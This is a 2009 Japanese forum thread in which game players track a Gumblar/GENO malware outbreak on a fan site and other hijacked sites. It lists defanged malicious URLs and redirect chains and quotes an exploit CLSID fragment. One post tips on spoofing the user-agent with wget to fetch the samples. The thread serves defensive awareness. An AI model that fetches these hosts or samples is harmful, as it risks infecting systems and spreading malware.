アドビリーダーはインスコしてないのでどうなるか分かりません。 <> (○口○*)さん<>sage<>09/10/18 17:56 ID:3tB6/M290<> evalぬいてdocument.writeで出力させてみたんだけど
このコードでぐぐったらそっくりなのが出てきたわ
m='BD96C556-65A3-11D0-983A-00C04FC29E3';

全く同じじゃないけど同類かもなー <> (○口○*)さん<>sage<>09/10/18 17:58 ID:3tB6/M290<> ぬけてた
>>760のファイルの話っす <> (○口○*)さん<>sage<>09/10/18 23:53 ID:Jm8AwEUe0<> 狩場情報の日替わりスクリプトっぷりは…(゚Д゚;) <> (○口○*)さん<>sage<>09/10/18 23:58 ID:Lu2dYnoJ0<> >>764のhttp://sugotech●com/flash/robots.phpは、狩場情報に現在埋め込まれている
http://saratogarepeaters●com/stats/styles.phpにリダイレクトされていた <> (○口○*)さん<>sage<>09/10/19 00:13 ID:nKUWEE3K0<> 404ってことは狩場情報をひらいても垢ハクやウィルスの感染はないってこと? <> (○口○*)さん<>sage<>09/10/19 00:24 ID:PX5Bd/6s0<> >>778
見てきたけど、あの404はアパッチなんかのhttpdが吐き出してるんじゃなくて、ウイルススクリプトが
404を吐き出してる。

スクリプトが削除された訳じゃなくてまだ生きてるから、古いAcrobatReaderならしっかり感染すると思うよ。 <> (○口○*)さん<>sage<>09/10/19 01:12 ID:l/BAf7af0<> >>777
情報thx
向こうもってくわ

styles.php (1/41)
http://www.virustotal.com/jp/analisis/daf706d6bbd9c47b0eff7dcfc486d5810b2b3ffc2a1081319df1806804af4b0c-1255882236 <> (○口○*)さん<>sage<>09/10/19 02:09 ID:DiqGaNp/0<> 念願の2PC起動が実現しそうなんだが、PC毎にプレイするアカウントを固定した場合、
1つのガンホーIDに複数のアカウントを作るより
複数ガンホーIDを用意してそこに1つずつアカウントを作成したほうが
リスクは軽減されるのだろうか・・・皆はどんな感じ? <> (○口○*)さん<>sage<>09/10/19 02:25 ID:Hi9/5Vig0<> >>781
>PC毎にプレイするアカウントを固定
この前提が成り立つなら、アカウント分けるほうが安全だし(もちろんパスワードは別物で)
ガンホーコイン管理以外にまとめるメリットも特にないだろうから
前提を維持できるんならアリだと思う

でも2PCの起動がめんどくさがってメインPCでサブ垢起動とかやりかねないんだよなw
そうなってくると意味が薄い上に利便性の面で足引っ張り出す <> (○口○*)さん<>sage<>09/10/19 10:27 ID:k1WRfV1c0<> こまめにロックしておくのが一番のような気がする
キャラごとのパスワード(数字4桁)って結局役に立ってないのだろうか? <> (○口○*)さん<>sage<>09/10/19 11:52 ID:DiqGaNp/0<> ゲーム起動ロックってよく考えると、
生年月日を特定されたらメアドを垢ハックする側のアドレスに変えられて
アウトのような気がするんだが・・・一応ROを終了する時は必ずしてるけど <> (○口○*)さん<>sage<>09/10/19 13:09 ID:ueSis//C0<> セキュパスは生年月日以外にも変更可能〜 <> (○口○*)さん<>sage<>09/10/19 13:32 ID:NX7c6Sj/0<> >>785
お、それは知らなかった
横レスだけどサンクス、仕事終わって家帰ったら設定変えて見る <> (○口○*)さん<>sage<>09/10/19 13:46 ID:l/BAf7af0<> 挿入位置は前と同じっぽい

GENOウイルススレ ★22
ttp://pc11.2ch.net/test/read.cgi/sec/1245640557/366
366 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/10/19(月) 10:55:17
再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html

zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。 <> (○口○*)さん<>sage<>09/10/19 14:57 ID:kWVxm86z0<> フローレンシアの公式サイトやられたのね <> (○口○*)さん<>age<>09/10/19 17:34 ID:ZV0tvew50<> 注意喚起のため、ageさせていただきます。

先週より、各種の公式HP(2chの掲示板では、芸能事務所など)に、
Gumblarウィルス(日本語通称GENOウィルス)を取得する不正な書き込みがありました。

今回のケースでは、今までのGENOウィルスとは違い、
改変されたHPのスクリプトに、感染用のHPへ移動するスクリプトが挿入されるという手法をとっています。
それにより、従来のGENOウィルスチェッカーでは検体があるかどうかの判定ができないケースが発生しています。

一応、従来のGENOウィルスの回避方法を記載させていただきます。
各自、対応及び対策をお願いいたします。
 更新作業
  ・Microsoft Updateを実施し、最新のパッチを適用する。
   (今回はOSとOfficeの脆弱性も使用されているらしい?)
  ・Acrobat ReaderとFlash Playerを最新のバージョンにアップする。
 
 回避策
  ・ブラウザを使用する際、Java Scriptを無効にしてください。
   これだけで大体は回避できるはずです。
  ・今回は対FireFox対策もされているそうですので、
   NoScript等のアドオンなども設定しておくとよいかと思います。

情報が更新され次第、順次書き込んでください。 <> (○口○*)さん<>sage<>09/10/19 18:08 ID:hZSIgOuh0<> >情報が更新され次第、順次書き込んでください。

どこかの転載ならそう書いてね
コピペ保管所じゃないんだからさ <> (○口○*)さん<>sage<>09/10/19 18:23 ID:JYjNXOcU0<> Adobe Readerが古い状態で狩場情報にアクセスすると
アカウントハックのウィルスに感染するってことでいいのかな…

ReaderのJavaScriptをOFFにしてたから防げたと思うんだけど
念のため、AVGでスキャン→カスペオンラインスキャンするか… <> (○口○*)さん<>sage<>09/10/19 19:30 ID:6nobTGT20<> >>791
OFFにしてもダメなパターンがあると思った <> (○口○*)さん<>age<>09/10/19 19:33 ID:ZV0tvew50<> >>790
すみませんorz
一応、2chの情報を自分なりにまとめています。
追加で何かあったら、追記してくださいということですorz
自分だけじゃ、情報抜けがありそうで…orz ほんと、申し訳ないです。

>>791
感染に関しては、Readerだけではなく、WindowsやFlash Playerの脆弱性も関係しているので、
その対策だけでは感染する可能性はあります。
本ウィルスの対策として、ReaderのJava Script無効化だけでは対策は不十分かと思います。

一応、Flash Playerをインストールしている場合は、最新版への対応させ、
Readerも同様に最新のものにアップデートさせ、
また、Windowsのパッチを最新のものに対応させてください。

現状、回避策はブラウザのJavaScriptを無効化すれば実行は防げるそうですが、
今のところ、ほかの対応策が必要かは別の情報次第かと。 <> (○口○*)さん<>sage<>09/10/19 19:34 ID:ZV0tvew50<> sageますorz
(何故にageたままなんだよ) <> (○口○*)さん<>sage<>09/10/19 19:45 ID:hZSIgOuh0<> こういう情報って検証が必要だから仕方ないのは分かるけれど、
どの脆弱性を突いた攻撃かっていうのが見えてこないから
対策で防げるのか未知の攻撃なのかサッパリわからなくて
いたずらに恐怖心だけ煽られてしまうんだよね。

>>793
書き込んでくださいっていきなり言われて「???」だったので、
てっきりどこかのコピペなのかと。了解しやしたよ。 <> (○口○*)さん<>sage<>09/10/19 19:58 ID:/+bfWo/00<> カスペのオンラインスキャンが随分前から止まっててうぜえ
.comの方は最近まで動いてたが、こっちも止まりやがった
さっさと最新版でも旧版でもいいから使えるようにしろよ <> (○口○*)さん<>sage<>09/10/19 20:15 ID:kWVxm86z0<> つ nifty <> (○口○*)さん<>sage<>09/10/19 21:19 ID:NFbwJvQ20<> JavaScript デフォoffにしてても見たいページ読み込めない時、
結局許可しちゃうからあんまり意味がない・・・。 <> (○口○*)さん<>sage<>09/10/20 00:05 ID:Wf3KMC+Q0<> 雄一郎さんのサイトがノートンのヒューリスティックに引っかかった。

http://safeweb.norton.com/report/show?url=http%3A%2F%2Fkodama3.skr.jp%2F&.x=9&.y=10

上はノートンのWebチェックサービス。
ほかのでやっても大丈夫だった。たいしたことないと思うけど一応教えておくよ。 <> (○口○*)さん<>sage<>09/10/20 00:20 ID:r6TzQpcN0<> >>799
その問題あるって言われてるファイルが見つからないな
バナーのgifファイルだったみたいだけど・・・ <> (○口○*)さん<>sage<>09/10/20 00:50 ID:vY2+fEY60<> 誤検知くさい気もするなぁ <> (○口○*)さん<>sage<>09/10/20 02:19 ID:1pM4S8T60<> peerblockを導入したら早速リネージュ資料室からダウンロードして登録した
「MMORPGトロイ」に記載されてたIPがブロックされててビビったんだが、
これは100%「俺が罠を踏んでそれが未然に防がれた」という事を意味するのだろうか。
もしくは、あくまでも警戒や予防の意味をもってブロックしただけで、
必ずしも罠を踏んだとは限らないのだろうか。
ちなみにブロックされたのはブログプレイタウンオンラインドットコム(実際は半角小文字) <> (○口○*)さん<>sage<>09/10/20 03:29 ID:r6TzQpcN0<> >>802
>警戒や予防の意味をもってブロックした
どういうこと?いってもないとこをブロックするの?
赤木キャプテンもびっくりだよ <> (○口○*)さん<>sage<>09/10/20 08:25 ID:uhCUJtQL0<> >>799
カウンター表示に使ってるtcount.cgiに反応しただけという気がしなくもない <> (○口○*)さん<>sage<>09/10/20 08:53 ID:8Esyou//0<> もう少し日本語で書いて欲しいよね <> (○口○*)さん<>sage<>09/10/20 10:41 ID:yXMRJZrA0<> 結局狩場情報ひっそりの乗っ取り(?)は、まだ続いてる状態?
知り合いがそこ使ってるらしいから、メンテ終わったら伝えねばならない・・・
最悪、もうハックされてるかもしれないな・・・ <> (○口○*)さん<>sage<>09/10/20 11:20 ID:P0LW1PYr0<> ここに書いて良いのかわからないんだけど
ウィルスPHP置き場にされてたらしい人の記事を見つけた

wordpressがクラックされたよ症状と対策まとめ
kanariia■com/blog/archives/612

追加されたソース3 にある
markokaldur■com/valgetahekiir/post_config.php
をSCOで見てみたら例の難読化したスクリプト

さらにURL削ってみたら
markokaldur■com/valgetahekiir/
でAguseGatewayのKasperskyがTrojan-Downloader.JS.Gumblar.xを検出

SCOで見てみたら
script src=HTTP://kanto■ac■jp/course/VIVID■php
が埋まってて、これも例の難読化したスクリプト

wordpress改ざんされた人はウィルスばらまきに利用されたとは気づいてないみたい <> (○口○*)さん<>sage<>09/10/20 11:35 ID:9m3sUaIj0<> >>806
対策されているかわからない状態ですので、まだ続いている状態だと思われます。
(SCOでチェックしたときは、まだ残っている状態でした。)

とりあえず、知り合いの方に、変なものを取得してしまっているかとかの確認はしたほうがいいです。
開いたときにJavaScriptがOFFであれば、それに越したことはないですが…。

ちゃんとした説明ができず、申し訳ないです。 <> (○口○*)さん<>sage<>09/10/20 12:18 ID:P0LW1PYr0<> >>806
一時撤去されても管理PCが汚染されたままだとまたやられると思う。

>>807の続きを少しだけ
kanto■ac■jp/は専門学校のサイトみたいだけど
ここも<body>直前に罠PHPが埋まってる。
それの直前に入ってるjava.jsの中身もやられてる。
きりがない <> (○口○*)さん<>sage<>09/10/20 13:19 ID:HSgNPqpg0<> >>806

ひっそりは再度ウイルスphpサイトが書き換わってるね。(何回目?)
飛んだ先で「//404」と例のいい加減なメッセージが出るからたぶん生きてるよ

どうしても見たいならviewsorcewithとかでひっそりをグーグルで表示させて、そこで
リンク先のソースを見るとかするのが楽かも。 <> (○口○*)さん<>sage<>09/10/20 14:07 ID:r6TzQpcN0<> >>807
base64のほうはGenoちゃんとは違う気がするんだけど
もしかして複数からやられてたのかな
この人の対策はサーバのことしか見てない(クライアントは問題ないと思ってる?)んで
再発がちょっと心配 <> (○口○*)さん<>sage<>09/10/20 14:18 ID:r6TzQpcN0<> markokaldur■com/valgetahekiir/post_config.php (1/40) カスペのみ
http://www.virustotal.com/jp/analisis/031ef47a31c05bd6fe3c1b36669eadc3d79b8dd905d3ec1bcfd2e611939a4c9d-1256015435

kanto■ac■jp/ → myrussia■kz/includes/regions.php (1/41) カスペのみ
http://www.virustotal.com/jp/analisis/faf89844fbaee4744236dbe11eb0a788dd7651d78503f7b6f6d8cac2cf42b416-1256015652

カスペは対応できたのかも
java.jsは正直吹いた
いろんなパターン送ったほうが良いと思うので向こうに持って行きます
前に出した2つもAviraはまだ解析中で返事が来ない・・・ <> (○口○*)さん<>sage<>09/10/20 14:47 ID:vY2+fEY60<> スクリプトを拾って投げる人へ念のため。
phpでUA文字列を見ているようで、IEかそれ以外かでスクリプトが異なります。
wget等で拾う人はUA偽装を忘れずに。 <> (○口○*)さん<>sage<>09/10/20 15:24 ID:vY2+fEY60<> >>809
kanto、上位サーバー(exe、pdf、swf、難読化スクリプト)と
下位サーバー(〜.phpの単純スクリプト)と両方兼ね備えちゃってるのね。
上位サーバーから下位サーバーへの降格は見たけど、これは珍品。 <> (○口○*)さん<>sage<>09/10/20 15:27 ID:r6TzQpcN0<> 正直細かく集めてないけどFFの人のとこに詳しく書いてあったね <> (○口○*)さん<>sage<>09/10/20 15:46 ID:r6TzQpcN0<> FFのとこちゃんと読んでなかったわ
ランダム部分は取得するたびに変わる把握
phpは伊達じゃないのね

post_config.phpのほうはまだ生きてるね <> (○口○*)さん<>sage<>09/10/20 17:51 ID:yXMRJZrA0<> つまり、一般人は暫く ひっそり見るなって事でおk? <> (○口○*)さん<>sage<>09/10/20 17:53 ID:RiRUJCb20<> 管理放置されちゃってるのかあ? <> (○口○*)さん<>sage<>09/10/20 18:14 ID:h7r8E+I90<> 迷惑だな
復活するする詐欺してねえでとっとと畳めばいいのに <> (○口○*)さん<>sage<>09/10/20 19:09 ID:gY61XZcb0<> いや本当に悪いのは何度もクラックされてしまっているのに改善の姿勢が見えないxreaなんだけどな。 <> (○口○*)さん<>sage<>09/10/20 19:17 ID:RiRUJCb20<> ん?広告がやられてるの? <> (○口○*)さん<>sage<>09/10/20 19:54 ID:nChjVv8a0<> 同鯖の他サイトでは特に見当たらなかったし、狩場さんが何か踏んで
FTPアカウント漏れて改竄喰らってるってとこ? <> (○口○*)さん<>sage<>09/10/20 22:37 ID:z/3HS9FJ0<> うちのカスペさんがひっそり開くたびに

ttp://folkartist-kr■com/ttt/m_mall_list■php
から
Trojan-Downloader.JS.Gumblar.x
をDLしようとして遮断してくてるって書きにきたら、数日前からおきてるのか <> (○口○*)さん<>sage<>09/10/20 23:03 ID:uKfJahSA0<> うちのカスペ2010でも同じ警告出たな <> (○口○*)さん<>sage<>09/10/20 23:07 ID:uKfJahSA0<> どうでもいいんだけど、うちのしょぼいシングルコアCelelon Mマシンの場合だと、
カスペ2010とRO用nProの相性具合は2009より良くなってる。トラブルどころか
より快適になってるのだが、トラブルだらけの人とどこが違っているんでしょうかねえ。 <> (○口○*)さん<>sage<>09/10/21 00:33 ID:I43sWRF90<> ID変わったはずだけど uKfJahSA0 です。

OSはWindows XP Home Edition(SP3)ですけど、本当にトラブルだらけの人って多いのかなあ
2ちゃんねるのカスペスレ情報なんか全く当てにならないし、カスペ自身のフォーラムを
読んでも「なんだかなあ」って感じだし、偽りのない本当の素直な意見がなかなか見られないってのが
本音ですね。NORTON2009や2010は使っていたんですけども、
意外にカスペより細かいトラブルが多いんだよねえ、それでカスペに戻ってきたってわけ。

個人的に「その時の自分にとってベストなチョイス」というポリシーで
ウィルス対策ソフトを適当に選んでいるだけなんですけど、どのソフトが良いだなんて
正直よくわからんです。

マルウェアを含んだURLをWebブラウザで読み込むとするでしょ。
NORTONシリーズは全部ダウンロードしてから、しかもキャッシュファイル作成後にやっと」
「警告」がでる仕様。カスペなんかはキャッシュファイル作成以前にブロックする仕様ですね。
こういった所も考えながら・・・やっぱりカスペの方がいいかなあ・・・なんて適当に考えてしまいます。 <> (○口○*)さん<>sage<>09/10/21 00:48 ID:w9bddti90<> 好きなのを使えば良いだろ
他人の意見をいちいち詮索するな <> (○口○*)さん<>sage<>09/10/21 00:56 ID:GJ41wysw0<> >>826
友人知人が悪く言っていた相手に会ってみたら普通の人だった
っていう経験したことない? <> (○口○*)さん<>sage<>09/10/21 01:21 ID:dP+QOeGs0<> 結局のところ何が言いたいのかわからない。 <> (○口○*)さん<>sage<>09/10/21 05:56 ID:t8FU6vYc0<> >>811
i-seifu■jp/index■html コンピュータ系の専門学校のサイトらしいが
<body>直前に罠PHP
common/text.js と Scripts/AC_RunActiveContent.js内部にも罠PHP
月間スケジュールとか日程のところに
>>807のWordpressやられた人のと似たようなエラーページが出てる。
base64の方は英語の相談掲示板でも入れられたとあったから
入れられる環境だとこっちも置かれてしまうのかもしれない。

もう1個
o123■jp/mixi/  mixi用のツール配布サイトらしい
<body>の前後に罠PHP、common.jsの中身もやられてる。
ここから繋がるアメリカのサイト(icat.ac■in/)もトップなどに罠PHPが埋まってる。
そっからロシアのサイトの繋がるけど、ここは罠PHPはないみたい。
北米と日本あるいはサイトの言語が英語か日本語だとばらまき(兼置き場)に使われて
それ以外だと置き場のみな感じがする。 <> (○口○*)さん<>sage<>09/10/21 05:58 ID:gHOndIuV0<> >>826
今のセキュスレはゲハよりひどい状態
ID出ないし各社新しいソフト出してる時期でしょ <> (○口○*)さん<>sage<>09/10/21 10:05 ID:TRd1wykK0<> 狩場そのままだな <> (○口○*)さん<>sage<>09/10/21 12:16 ID:P7KUJjqD0<> チェックサイトでひっそりしらべてもグリーンなんだけど
対応されたりとかしたの? <> (○口○*)さん<>sage<>09/10/21 12:32 ID:BUX8ixXF0<> 自分で判断しろよ <> (○口○*)さん<>sage<>09/10/21 14:17 ID:wstwbN6b0<> >>833
今回の手法は通常のGENOウィルスチェッカー及びaguseでは確認不可。
ソースチェッカーオンラインで隠しスクリプトがある場合、まだ対応されていない可能性がある。 <> (○口○*)さん<>sage<>09/10/21 14:29 ID:c30wpumx0<> 混乱を招くだけのチェックサイトは危ないね

>>830
情報thx
難読化のパターンはいくつかあるかもしれないってことだね
mixi関連だと踏んでる人たくさんいそうだなあ <> (○口○*)さん<>sage<>09/10/21 16:24 ID:yAcnlQhe0<> 被害拡大を防ぐ意味でも、ひっそりのURIをFirefox経由でstopBADware.orgに投げてみた。
再開するにしても、xreaの再利用はないだろうし。
もっとも、ROの先行きが不安定な現状で、サイト維持のモチベーションが失われてしまっているのかもしれないけれど。 <> (○口○*)さん<>sage<>09/10/21 16:48 ID:G7DKOVH40<> もう狩場情報はいいよ <> (○口○*)さん<>sage<>09/10/21 17:02 ID:c30wpumx0<> ぐぐると出てくるセイプロダクション(なかったことになった?)→
usepetrol2earn■com→ar-global■com 打ち止め
エリートkantoは2世代
つーかkantoさん気づいて修正したっぽいけどまたやられてるし・・・ <> (○口○*)さん<>sage<>09/10/21 20:30 ID:6QAK6/5R0<> >>839
ar-global■comは朝見たときは
トップに罠PHP、rightclick.js と Js/menu.js と stmenu.js の中身がやられてたよ。
修正したんだろうね。
ここは他と違って3カ所に置かれている罠PHPが埋めてあった。
インド、トルコ、ロシアのサイトに繋がってたけどそこで打ち止めだった。 <> (○口○*)さん<>sage<>09/10/21 21:24 ID:6QAK6/5R0<> ググってみたらフランス語やスペイン語の掲示板でも罠PHP入れられてるけどどうしたら?みたいなのが見つかったから時間差なのかな。
で、妙なもの見つけた
charleszoltan■free■fr/
elitearmedforcesautofinance■com/tmp/application■php (今回の主役?の罠PHP)と
cliqe■ru:8080/index■php (Gumblarと同系列なのかどうかわからないといわれたやつ)が同居してる
Scripts/AC_RunActiveContent■js の中も罠PHPでいっぱい <> (○口○*)さん<>sage<>09/10/21 21:40 ID:wstwbN6b0<> どんだけ仕込んでるんだろう、罠PHP。
今までは一ソースだけなのに、ほかの外部読み込みJavaScriptファイルにも仕込むとは…。
まだニュースになっていないだけに、結構被害が大きくなるような気がします。
(Yahooニュースしか見てないです)

そういえば、今まで報告が来ていた内容を見てみると、
JavaScript関係のファイルばかりだけど、
ブラウザ設定でJavaScriptを無効にすれば回避できるものですか?
それとも、Javaとかも切っておいたほうがいいですか? <> (○口○*)さん<>sage<>09/10/21 21:59 ID:RTHI1UPk0<> JavaとJavaScriptがどう違うかも理解してないのか。 <> (○口○*)さん<>sage<>09/10/22 00:42 ID:czXW2GTH0<> >>842
まあ念のためJavaもオフにしとくのは悪いことじゃない
どうせほとんど使われてないし <> (○口○*)さん<>sage<>09/10/22 01:07 ID:YVArNzHM0<> >>841
8080のは今回のよりちょっと前に流行しかけた物。
Gumblarの亜種だけど、今回ほど被害が広まらなかったので
あまり話題にはならなかった気がする。 <> (○口○*)さん<>sage<>09/10/22 04:20 ID:fIRpZKYO0<> >>845
そうなんだけど、以前のと今回と書き込みスクリプトがかなり違うんだよね。
それでちょっと気になった

www■pole13■com/というフランスのサイトにも>>841のとほぼ同じものが埋まってる
→nicolematernity■com/(アメリカの妊婦服・子供服の通販サイト)
→bolcsvolgyi■hu/ ハンガリーのサイトみたいだけど AguseGatewayで見ると真っ白
AguseのKasuperskyが Trojan-Downloader.VBS.Psyme.gf を検出 <> (○口○*)さん<>sage<>09/10/22 05:57 ID:fIRpZKYO0<> サイト改ざんで閲覧者にウイルス感染の可能性 - JRA関連サイト
ttp://www.security-next.com/011357.html

検索にはかからなかったよね <> (○口○*)さん<>sage<>09/10/22 07:40 ID:fIRpZKYO0<> 連投ごめん

Zeus Bot Joins Gumblar Attacks (ScanSafe)
ttp://blog.scansafe.com/journal/2009/10/20/zeus-bot-joins-gumblar-attacks.html <> (○口○*)さん<>sage<>09/10/22 08:05 ID:KIA3PAuk0<> GENO再来とか騒ぐ前に、GENO収束しても、同手法のものは余所で継続してた訳で…結局は>>848だな。 <> (○口○*)さん<>sage<>09/10/22 11:42 ID:j0FRsO470<> もうセキュリティ関係に神経使いすぎて嫌になってきた
ネット回覧orRO用のPCをもう1台買おうかな・・・ <> (○口○*)さん<>sage<>09/10/22 12:18 ID:WTi/9nIK0<> >>850

vmwareかvboxにubuntuでいいだろ。
こことか2chはFirefoxにchaikaで楽に回れるし。

オレは怪しげなサイトとかRO関係のサイトを回る時にはそうしてる。
この環境でヤバいのは精神的ブラクラくらいなもんかな。 <> (○口○*)さん<>sage<>09/10/22 19:09 ID:vJrT7hwg0<> ミスって狩場情報ひっそりのURLをクリックしてしまったのですが、いつも通りの背景真っ白の日記みたいなページで、一番上の方に「改ざんされてます。アクセスしちゃダメ」ってメッセージが追加されてるだけでした・・・

このページを一瞬表示しただけでもウィルスかかってしまったんでしょうか・・・;ω; <> (○口○*)さん<>sage<>09/10/22 19:31 ID:8GbrPKL40<> >>改ざんされてます。アクセスしちゃダメ
のメッセージが追加された後ってことは、狩場情報の中の人がスクリプトタグを消し
パスワード変更等対策後であろうから大丈夫だと思いたいが、なんの保証もできない。 <> (○口○*)さん<>sage<>09/10/22 19:49 ID:czXW2GTH0<> >>852
心配ならOS入れなおしが精神的にも安全だよ <> (○口○*)さん<>sage<>09/10/22 20:04 ID:V8TnGOTR0<> >>1くらい見ろボケ <> (○口○*)さん<>sage<>09/10/22 21:05 ID:DYrwb6PE0<> 踏んだ人は焦るもの。俺もはじめはものすごい焦った。
今回は確実にヤバイと判ってるページだし、そう罵倒しなさんな。

ただまぁ現状は>>853-854さんの言う通りです。 <> (○口○*)さん<>sage<>09/10/22 21:06 ID:cHvbSqFd0<> 俺も開いちゃったわ。
SCOで見たら大丈夫だったから多分大丈夫だと思うけど。
avastは反応しなかったけど、1年くらい使ってて反応したこと一度もないからなー・・ <> (○口○*)さん<>sage<>09/10/22 21:33 ID:V8TnGOTR0<> >>857
>>835 <> (○口○*)さん<>sage<>09/10/22 22:04 ID:czXW2GTH0<> ソースを見たってことでしょ
実際<body>前の<script>は取り除かれてるし <> (○口○*)さん<>sage<>09/10/22 22:05 ID:cbOiUAEz0<> ひっそりの中の人が何らかの対応を取ったのは事実だろうけど、やっぱり経緯については一言欲しいかなあ。
あの場所を再利用するのに気が引けるなら、こっちでも良いし、twitterあたりに避難する手だってある。 <> (○口○*)さん<>sage<>09/10/22 22:36 ID:SCgjrp9S0<> >>859
わかってねーのに口出すな <> (○口○*)さん<>sage<>09/10/22 22:45 ID:rSfS7G1A0<> 罠リンクを踏まない限りはまだセーフのwikiと比べて、
踏んだら終わり&ある程度有名な情報サイトってのが実に危ない <> (○口○*)さん<>sage<>09/10/22 23:12 ID:8GbrPKL40<> 比較が正しくない <> (○口○*)さん<>sage<>09/10/22 23:38 ID:vJrT7hwg0<> >>853-860
皆さんレスありがとうございました;ω;
初めてこのスレに来たので、焦って>>1も読まずに思ったままの質問を投下してしまいました・・・すみませんTT
今までずっと過去レス読んでましたが、一応今はゲーム起動をロックして、マイPC唯一のセキュリティソフトのAVGさんにスキャンしてもらってます・・・

↓にテンプレを貼ってみます。初めて貼るので変なこと書いているところがあるかもですが・・・

【      気付いた日時          】 10/22 19:09
【不審なアドレスのクリックの有無 】 今話題のひっそりさんを踏んでしまった(ttp://huntinfo■xrea■jp/)
【他人にID/Passを教えた事の有無】 無
【他人が貴方のPCを使う可能性の有無】 無
【    ツールの使用の有無      】 無
【  ネットカフェの利用の有無    】 無
【     OS    】 Windows XP, Home Edition, Ver.2002, Service Pack 3
【使用ブラウザ 】 Mozilla Firefox 1.9.1.3523(とファイルバージョンに書かれてました・・・比較的最近更新してるはず・・・)
【WindowsUpdateの有無】 つい昨日Updateしようとして、最新の更新は無いよといわれました
【 アンチウイルスソフト 】 AVG Anti-Virus Free edition 8.5.0.418
【その他のSecurty対策 】 よくわかりません(ノд`)。゚・
【 ウイルススキャン結果】 (今AVGでやってますが、Tracking cookie.〜とか言うのが色々検出されてますorz
【スレログやテンプレを読んだか】 Yes.このスレはある程度読みました・・・理解はうっすらとしか;
【hostsファイルの変更】良くわかりませんが、してないと思います
【PeerGuardian2の導入】無
【説明】 踏んだ瞬間はAVGは無反応でした。色々なソフトの更新はコマメにしている方だと思います(ノд`)。゚・

今過去ログにあったソースチェッカーオンラインでひっそりを調べてみたら、隠しスクリプトが発見されましたと出てますね・・・
今夜は眠れない夜を過ごすことになりそうです・・・ <> (○口○*)さん<>sage<>09/10/23 00:00 ID:1mQ8wtaW0<> Genoスレにあったひきこもり共和国→bellsworld■com→psunrise■cn
やっぱだいたい3つなのかなー
4つ以上ってのは見たことない

VirusTotal投げたけどやっぱりカスペのみだなー <> (○口○*)さん<>sage<>09/10/23 00:04 ID:Vsd9zDEJ0<> >>860
仮にローカルがやられてたとしたらどこへ行っても一緒になっちゃうしね
そこらへんがどうなったんだかわかんないんじゃ別鯖で再開されても怖くて踏めない <> (○口○*)さん<>sage<>09/10/23 00:07 ID:1mQ8wtaW0<> 実際に某美容専門学校は二度目やられてるしなあ

>>864
Tracking cookieは関係ないよ
つーかそのレベルじゃAVGより統合セキュリティソフトを買ってきたほうがよさげ
よくわからない場合はお金を払ってサポートしてもらったほうが良いよ
フリーのは自分でなんとかできる子用です <> 852&864<>sage<>09/10/23 00:12 ID:N+qhacUV0<> 今スキャンし終わってきました。警告18件だけで、特に脅威は検出ありませんでした・・・

>>867

Tracking cookie〜はやっぱり関係なかったですか・・・
AVGはROを始めた当初に友人に勧められて入れてからずっと5年くらい使ってるのですが、やっぱりちゃんとしたウィルスソフトを使った方が良いんですね・・・
日頃は色々警戒心を持ってWeb見てるんですが、こういう時に自分の無力さを痛感します;ω;
レスありがとうございました・・・ <> (○口○*)さん<>sage<>09/10/23 00:45 ID:T2IsW07U0<> ちゃんとと言うのは、『ちゃんとサポートを受けれる』って意味だからな

フリーだから作りが悪いって意味じゃないので間違えないように <> (○口○*)さん<>sage<>09/10/23 01:06 ID:PtsvoKho0<> セキュリティホールmemoの WordPress 2.8.5 リリース という記事内にあった
ヤラレた事例のリンク先覗いてみたら
>>807のWordPress改ざんされた人のと同じようなbase64入れられた人のところに飛んだ。
どうもこの改ざん9月初旬ぐらいから広がってたらしい。
バックドア作られてあとから罠PHPを置かれてるところもあるのかもしれない。
深く静かに進行してたものが10月になって表面化しただけってことか?

>>868
FireFoxのバージョンはヘルプから FireFoxについて をクリックすると見れるはずだけど
今サポートされてるのは3.5.3と3.0.14で、それ以前のを使うなら自己責任。
この分だとFlashPlayerとかAdobeReaderのバージョンも怪しそう <> (○口○*)さん<>sage<>09/10/23 01:35 ID:K0biO1EL0<> Firefoxは3.5.3みたいだよ
実行ファイル右クリックしてバージョン確認したらしい <> (○口○*)さん<>sage<>09/10/23 02:02 ID:Su+FKz+T0<> >>870
まあfirefox.exeのプロパティを眺めてみて
下四桁まであるとかそもそも1.9とか、Fxではありえないバージョン番号なんだしさw

>>871
「製品バージョン」に気づかないあたり、チップヘルプ見ただけかと <> (○口○*)さん<><>09/10/23 02:30 ID:Xfd/c/nb0<> オンラインスキャンで全HDDがウイルス等にひっかからなければ大丈夫なんですか? <> (○口○*)さん<>sage<>09/10/23 02:32 ID:5gpemGQe0<> 確実に大丈夫と言う保証は無い <> (○口○*)さん<><>09/10/23 02:46 ID:Xfd/c/nb0<> >>874

やっぱそうですよね;;
OSの再インストール時にはやはり全HDDをフォーマットしたほうがいいのかな;;; <> (○口○*)さん<>sage<>09/10/23 03:26 ID:jGJW5iC70<> OS再インストールも修復じゃなく、HDDフォーマットからのクリーンインストールが重要
兎に角、危ないかなと判明したら、>>1からのテンプレ対策が望ましい
中には>>851のように仮想やLinux環境からネット閲覧する人もいますよ

再インスコする場合、大事なデータのバックアップも忘れずにね <> (○口○*)さん<>sage<>09/10/23 03:33 ID:1mQ8wtaW0<> 今回のはスクリプトも本体も検出率がかなり低いのです

不安なら全てフォーマットして入れなおしが無難ということになります
それが一番安全確実
クリーンな環境になったあとか他の安全なPCで
ネット上のサービス全般についてパスワード変更も推奨します <> (○口○*)さん<><>09/10/23 03:45 ID:Xfd/c/nb0<> 狩場情報ひっそりアクセス後(見ちゃダメの警告表示画面ですが)
ノートンウイルスキラーおよびトレンドマイクロでの検索で何も検出されませんでした。

一応これからカスペとジーデータをやってみたいと思います。
不安で胸いっぱいじゃなく、希望で胸いっぱいにしたorz <> (○口○*)さん<>sage<>09/10/23 03:56 ID:E/1q+bxx0<> >>872
1.9というversionはFirefox本体では取り得ないけど、Geckoのrevisionとしては存在している。
H)elp -> A)bout Firefoxでも、rv:として表され、ブラウザのUAとしても出力される。
ttps://developer.mozilla.org/ja/User_Agent_Strings_Reference
↑の補足 ttp://www.minc.ne.jp/~konda/web_resoce/js/user-agent-search.html <> (○口○*)さん<>sage<>09/10/23 05:52 ID:a1OVg5ll0<> JAVA無効とアップデートやってれば対策ソフトなくてもいいの?
